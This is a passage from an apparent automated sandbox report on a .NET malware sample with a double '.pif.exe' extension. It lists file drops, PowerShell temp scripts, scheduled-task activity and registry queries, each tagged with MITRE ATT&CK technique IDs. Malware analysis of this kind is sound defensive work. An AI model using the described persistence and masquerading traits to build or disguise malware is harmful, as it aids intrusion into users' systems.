[%APPDATA%\\SUbPwEbpBhA.exe]- [targetUID: 00000000-00002912]\n Dropped file: \"57C8EDB95DF3F0AD4EE2DC2B8CFD4157\" - Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00004784]\n Dropped file: \"57C8EDB95DF3F0AD4EE2DC2B8CFD4157\" - Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00004784]\n Dropped file: \"StartupProfileData-NonInteractive\" - Location: [%LOCALAPPDATA%\\Microsoft\\Windows\\PowerShell\\StartupProfileData-NonInteractive]- [targetUID: 00000000-00004784]", "origin": "Binary File", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"PCGB2GtVYuBR0mw.pif.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"PCGB2GtVYuBR0mw.pif.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"PCGB2GtVYuBR0mw.pif.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"PCGB2GtVYuBR0mw.pif.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"PCGB2GtVYuBR0mw.pif.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"\n \"PCGB2GtVYuBR0mw.pif.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll\"\n \"PCGB2GtVYuBR0mw.pif.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll\"\n \"PCGB2GtVYuBR0mw.pif.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll\"\n \"PCGB2GtVYuBR0mw.pif.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-appmodel-runtime-l1-1-2.dll\"\n \"PCGB2GtVYuBR0mw.pif.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-appmodel-runtime-l1-1-0.dll\"\n \"PCGB2GtVYuBR0mw.pif.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\VCRUNTIME140_CLR0400.dll\"\n \"PCGB2GtVYuBR0mw.pif.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ucrtbase_clr0400.dll\"\n \"PCGB2GtVYuBR0mw.pif.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-quirks-l1-1-0.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"PCGB2GtVYuBR0mw.pif.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"powershell.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"PCGB2GtVYuBR0mw.pif.exe\" reads file \"c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config\"\n \"PCGB2GtVYuBR0mw.pif.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll.aux\"\n \"PCGB2GtVYuBR0mw.pif.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.windows.forms\\c9a4cbc00f690a9e3cddfc400f6e85bb\\system.windows.forms.ni.dll.aux\"\n \"PCGB2GtVYuBR0mw.pif.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\0b2f69b43a576b9edcc807a30872bd91\\system.ni.dll.aux\"\n \"PCGB2GtVYuBR0mw.pif.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\2c3c912ea8f058f9d04c4650128feb3f\\system.ni.dll.aux\"\n \"PCGB2GtVYuBR0mw.pif.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.drawing\\f7568d7f1b9d356f64779b4c0927cfb3\\system.drawing.ni.dll.aux\"\n \"PCGB2GtVYuBR0mw.pif.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.configuration\\96f7edb07b12303f0ec2595c7f3778c7\\system.configuration.ni.dll.aux\"\n \"PCGB2GtVYuBR0mw.pif.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\31fae3290fad30c31c98651462d22724\\system.core.ni.dll.aux\"\n \"PCGB2GtVYuBR0mw.pif.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\15af16d373cf0528cb74fc73d365fdbf\\system.xml.ni.dll.aux\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"PCGB2GtVYuBR0mw.pif.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"PCGB2GtVYuBR0mw.pif.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"\n \"PCGB2GtVYuBR0mw.pif.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll\"\n \"PCGB2GtVYuBR0mw.pif.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll\"\n \"PCGB2GtVYuBR0mw.pif.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll\"\n \"PCGB2GtVYuBR0mw.pif.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"PCGB2GtVYuBR0mw.pif.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"PCGB2GtVYuBR0mw.pif.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"\n \"powershell.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"powershell.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"\n \"powershell.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll\"\n \"powershell.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll\"\n \"powershell.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll\"\n \"powershell.exe\" touched file \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config\"\n \"powershell.exe\" touched file \"C:\\Windows\\Microsoft.Net\\assembly\\GAC_32\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll.config\"\n \"powershell.exe\" touched file \"C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.pdb\"\n \"powershell.exe\" touched file \"C:\\Windows\\System.Management.Automation.pdb\"\n \"powershell.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\StartupProfileData-NonInteractive\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"PCGB2GtVYuBR0mw.pif.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"\"; Value: \"\")\n \"PCGB2GtVYuBR0mw.pif.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\"; Key: \"\"; Value: \"\")\n \"PCGB2GtVYuBR0mw.pif.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\"; Key: \"\"; Value: \"\")\n \"PCGB2GtVYuBR0mw.pif.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\"; Key: \"\"; Value: \"\")\n \"PCGB2GtVYuBR0mw.pif.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\"; Key: \"\"; Value: \"\")\n \"PCGB2GtVYuBR0mw.pif.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{11016101-E366-4D22-BC06-4ADA335C892B}\"; Key: \"\"; Value: \"\")\n \"PCGB2GtVYuBR0mw.pif.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\"; Key: \"\"; Value: \"\")\n \"PCGB2GtVYuBR0mw.pif.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\"; Key: \"\"; Value: \"\")\n \"PCGB2GtVYuBR0mw.pif.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"\"; Value: \"\")\n \"PCGB2GtVYuBR0mw.pif.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\"; Key: \"\"; Value: \"\")\n \"PCGB2GtVYuBR0mw.pif.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\\DESKTOP\\NAMESPACE\"; Key: \"\"; Value: \"\")\n \"PCGB2GtVYuBR0mw.pif.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\\DESKTOP\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"\"; Value: \"\")\n \"PCGB2GtVYuBR0mw.pif.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")\n \"PCGB2GtVYuBR0mw.pif.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")\n \"PCGB2GtVYuBR0mw.pif.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\DATACOLLECTION\"; Key: \"\"; Value: \"\")\n \"PCGB2GtVYuBR0mw.pif.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"PCGB2GtVYuBR0mw.pif.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\\ASSEMBLYSTORAGEROOTS\"; Key: \"\"; Value: \"\")\n \"PCGB2GtVYuBR0mw.pif.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SHELLCOMPATIBILITY\\OBJECTS\\{871C5380-42A0-1069-A2EA-08002B30309D}\"; Key: \"\"; Value: \"\")\n \"PCGB2GtVYuBR0mw.pif.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\POWERSHELL.EXE\"; Key: \"\"; Value: \"\")\n \"PCGB2GtVYuBR0mw.pif.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\POWERSHELL.EXE\"; Key: \"\"; Value: \"\")\n \"PCGB2GtVYuBR0mw.pif.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"PCGB2GtVYuBR0mw.pif.exe\" connecting to \"\\ThemeApiPort\"\n \"schtasks.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"PCGB2GtVYuBR0mw.pif.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\MSCOREE.DLL\"\n \"PCGB2GtVYuBR0mw.pif.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"PCGB2GtVYuBR0mw.pif.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"PCGB2GtVYuBR0mw.pif.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"PCGB2GtVYuBR0mw.pif.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"PCGB2GtVYuBR0mw.pif.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"PCGB2GtVYuBR0mw.pif.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"PCGB2GtVYuBR0mw.pif.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"PCGB2GtVYuBR0mw.pif.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"PCGB2GtVYuBR0mw.pif.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"PCGB2GtVYuBR0mw.pif.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"PCGB2GtVYuBR0mw.pif.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\MSCOREE.DLL.local\"\n \"PCGB2GtVYuBR0mw.pif.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll\"\n \"PCGB2GtVYuBR0mw.pif.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"PCGB2GtVYuBR0mw.pif.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"PCGB2GtVYuBR0mw.pif.exe\" trying to access non-existent file \"C:\\Windows\\SYSTEM32\\MSCOREE.DLL.local\"\n \"PCGB2GtVYuBR0mw.pif.exe\" trying to access non-existent file \"C:\\PCGB2GtVYuBR0mw.pif.exe.config\"\n \"PCGB2GtVYuBR0mw.pif.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\fusion.localgac\"\n \"PCGB2GtVYuBR0mw.pif.exe\" trying to access non-existent file \"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\jQXD\\\"\n \"PCGB2GtVYuBR0mw.pif.exe\" trying to access non-existent file \"C:\\PCGB2GtVYuBR0mw.pif.INI\"\n \"PCGB2GtVYuBR0mw.pif.exe\" trying to access non-existent file \"C:\\PCGB2GtVYuBR0mw.pif.exe.Local\\\"\n \"PCGB2GtVYuBR0mw.pif.exe\" trying to access non-existent file \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe:Zone.Identifier\"\n \"PCGB2GtVYuBR0mw.pif.exe\" trying to access non-existent file \"C:\\Windows\\System32\\schtasks.exe:Zone.Identifier\"\n \"PCGB2GtVYuBR0mw.pif.exe\" trying to access non-existent file \"C:\\Windows\\System32\\MSCOREE.DLL.LOCAL\"\n \"PCGB2GtVYuBR0mw.pif.exe\" trying to access non-existent file \"C:\\PCGB2GTVYUBR0MW.PIF.EXE.CONFIG\"\n \"PCGB2GtVYuBR0mw.pif.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\FUSION.LOCALGAC\"\n \"PCGB2GtVYuBR0mw.pif.exe\" trying to access non-existent file \"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\JQXD\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"PCGB2GtVYuBR0mw.pif.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"PCGB2GtVYuBR0mw.pif.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"PCGB2GtVYuBR0mw.pif.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"PCGB2GtVYuBR0mw.pif.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{11016101-E366-4D22-BC06-4ADA335C892B}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"PCGB2GtVYuBR0mw.pif.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"PCGB2GtVYuBR0mw.pif.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")\n \"PCGB2GtVYuBR0mw.pif.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"LOADWITHOUTCOM\"; Value: \"\")\n \"PCGB2GtVYuBR0mw.pif.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\INTERNET EXPLORER\\EUPP PROTECTED - IT IS A VIOLATION OF WINDOWS POLICY TO MODIFY. SEE AKA.MS/BROWSERPOLICY\"; Key: \"FIRSTRUNCOMPLETE\"; Value: \"\")\n \"PCGB2GtVYuBR0mw.pif.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\DATACOLLECTION\"; Key: \"COMMERCIALDATAOPTIN\"; Value: \"\")\n \"PCGB2GtVYuBR0mw.pif.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"PCGB2GtVYuBR0mw.pif.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\POWERSHELL.EXE\"; Key: \"\"; Value: \"\")\n \"PCGB2GtVYuBR0mw.pif.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC4-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"GENERATION\"; Value: \"\")\n \"PCGB2GtVYuBR0mw.pif.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\KINDMAP\"; Key: \".EXE\"; Value: \"\")\n \"PCGB2GtVYuBR0mw.pif.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\.EXE\"; Key: \"\"; Value: \"\")\n \"PCGB2GtVYuBR0mw.pif.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\EXEFILE\"; Key: \"ISSHORTCUT\"; Value: \"\")\n \"PCGB2GtVYuBR0mw.pif.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\EXEFILE\"; Key: \"NOSTATICDEFAULTVERB\"; Value: \"\")\n \"PCGB2GtVYuBR0mw.pif.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\EXEFILE\\SHELL\"; Key: \"\"; Value: \"\")\n \"PCGB2GtVYuBR0mw.pif.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\EXEFILE\\SHELL\\OPEN\"; Key: \"NEVERDEFAULT\"; Value: \"\")\n \"PCGB2GtVYuBR0mw.pif.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\EXEFILE\\SHELL\\OPEN\\COMMAND\"; Key: \"DELEGATEEXECUTE\"; Value: \"\")\n \"PCGB2GtVYuBR0mw.pif.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\.ADE\"; Key: \"\"; Value: \"\")\n \"PCGB2GtVYuBR0mw.pif.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\.ADP\"; Key: \"\"; Value: \"\")\n \"PCGB2GtVYuBR0mw.pif.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\.ASP\"; Key: \"\"; Value: \"\")\n \"PCGB2GtVYuBR0mw.pif.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\.BAS\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"PCGB2GtVYuBR0mw.pif.exe\" writes file \"c:\\users\\%osuser%\\appdata\\roaming\\subpwebpbha.exe\"\n \"PCGB2GtVYuBR0mw.pif.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\tmp2f3b.tmp\"\n \"powershell.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\xkt31g2x.oo5.ps1\"\n \"powershell.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\avk3cgll.dqe.psm1\"\n \"powershell.exe\" writes file \"c:\\users\\%osuser%\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\57c8edb95df3f0ad4ee2dc2b8cfd4157\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-173", "type": 6, "relevance": 1, "name": "Tries to access Powershell profile file", "description": "\"powershell.exe\" trying to access file \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PROFILE.PS1\"\n \"powershell.exe\" trying to access file \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\MICROSOFT.POWERSHELL_PROFILE.PS1\"\n \"powershell.exe\" trying to access file \"C:\\Users\\%OSUSER%\\Documents\\WINDOWSPOWERSHELL\\PROFILE.PS1\"\n \"powershell.exe\" trying to access file \"C:\\Users\\%OSUSER%\\Documents\\WINDOWSPOWERSHELL\\MICROSOFT.POWERSHELL_PROFILE.PS1\"\n \"powershell.exe\" trying to access file \"%WINDIR%\\System32\\WindowsPowerShell\\v1.0\\PROFILE.PS1\"\n \"powershell.exe\" trying to access file \"%WINDIR%\\System32\\WindowsPowerShell\\v1.0\\MICROSOFT.POWERSHELL_PROFILE.PS1\"\n \"powershell.exe\" trying to access file \"%USERPROFILE%\\Documents\\WINDOWSPOWERSHELL\\PROFILE.PS1\"\n \"powershell.exe\" trying to access file \"%USERPROFILE%\\Documents\\WINDOWSPOWERSHELL\\MICROSOFT.POWERSHELL_PROFILE.PS1\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"SUbPwEbpBhA.exe\" has type \"PE32 executable (GUI) Intel 80386 Mono/.Net assembly for MS Windows\"- Location: [%APPDATA%\\SUbPwEbpBhA.exe]- [targetUID: 00000000-00002912]\n \"57C8EDB95DF3F0AD4EE2DC2B8CFD4157\" has type \"Microsoft Cabinet archive data Windows 2000/XP setup 4761 bytes 1 file at 0x2c +A \"disallowedcert.stl\" number 1 1 datablock 0x1 compression\"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00004784]\n \"tmp2F3B.tmp\" has type \"XML 1.0 document ASCII text\"- Location: [%TEMP%\\tmp2F3B.tmp]- [targetUID: 00000000-00002912]\n \"logs.dat\" has type \"data\"- [targetUID: N/A]\n \"57C8EDB95DF3F0AD4EE2DC2B8CFD4157\" has type \"data\"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00004784]\n \"StartupProfileData-NonInteractive\" has type \"data\"- Location: [%LOCALAPPDATA%\\Microsoft\\Windows\\PowerShell\\StartupProfileData-NonInteractive]- [targetUID: 00000000-00004784]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-39", "type": 8, "relevance": 1, "name": "Drops XML files", "description": "\"tmp2F3B.tmp\" has type \"XML 1.0 document ASCII text\" - Location: [%TEMP%\\tmp2F3B.tmp]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-53", "type": 8, "relevance": 1, "name": "Drops temp files", "description": "\"tmp2F3B.tmp\" has type \"XML 1.0 document ASCII text\" - Location: [%TEMP%\\tmp2F3B.tmp]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": 